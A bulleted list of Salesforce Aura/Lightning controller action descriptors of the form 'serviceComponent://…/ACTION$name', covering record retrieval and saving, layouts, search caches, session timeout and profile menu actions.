  • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord
  • serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$saveSectionState
  • serviceComponent://ui.force.components.controllers.dynamicLabel.UiDynamicLabelProviderController/ACTION$getLabel
  • serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData
  • serviceComponent://ui.force.components.controllers.inlineEdit.InlineEditController/ACTION$getNameField
  • serviceComponent://ui.force.components.controllers.inlineEdit.InlineEditController/ACTION$getPostSaveNavigationEvent
  • serviceComponent://ui.force.components.controllers.logoutHandler.LogoutHandlerController/ACTION$getLogoutURL
  • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$createQuickActionRecords
  • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$createRecord
  • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$deleteRecord
  • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$getRecord
  • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$saveQuickActionRecords
  • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$saveRecord
  • serviceComponent://ui.force.components.controllers.recordGlobalValueProvider.RecordGvpController/ACTION$saveRecords
  • serviceComponent://ui.force.components.controllers.recordLayoutBroker.RecordLayoutBrokerController/ACTION$getLayout
  • serviceComponent://ui.force.components.controllers.recordLayoutBroker.RecordLayoutBrokerController/ACTION$getRecordAndLayout
  • serviceComponent://ui.force.impl.aura.components.force.recordEditActions.RecordEditActionsController/ACTION$getEditActions
  • serviceComponent://ui.global.components.one.actionsManager.ActionsManagerController/ACTION$handleAction
  • serviceComponent://ui.identity.components.sessiontimeoutwarn.SessionTimeoutWarnController/ACTION$getSessionRefreshAction
  • serviceComponent://ui.identity.components.sessiontimeoutwarn.SessionTimeoutWarnController/ACTION$getSessionTimeoutConfig
  • serviceComponent://ui.instrumentation.components.beacon.InstrumentationBeaconController/ACTION$getLocators
  • serviceComponent://ui.instrumentation.components.beacon.InstrumentationBeaconController/ACTION$sendData
  • serviceComponent://ui.search.components.forcesearch.sgdp.MRUCacheController/ACTION$getGlobalMrus
  • serviceComponent://ui.search.components.forcesearch.sgdp.PermsAndPrefsCacheController/ACTION$getPermsAndPrefs
  • serviceComponent://ui.search.components.forcesearch.sgdp.ResultsFiltersCacheController/ACTION$getResultsFilterMetadata
  • serviceComponent://ui.search.components.forcesearch.sgdp.ScopesCacheController/ACTION$getEntityLabels
  • serviceComponent://ui.search.components.forcesearch.sgdp.ScopesCacheController/ACTION$getEntityNames
  • serviceComponent://ui.search.components.forcesearch.sgdp.ScopesCacheController/ACTION$getScopeMaps
  • serviceComponent://ui.self.service.components.profileMenu.ProfileMenuController/ACTION$getContextUserPhotoUrlAndUpdatedName
  • serviceComponent://ui.self.service.components.profileMenu.ProfileMenuController/ACTION$getProfileMenuResponse
  • serviceComponent://ui.sfa.components.nativeimport.ImportButtonController/ACTION$getConfig
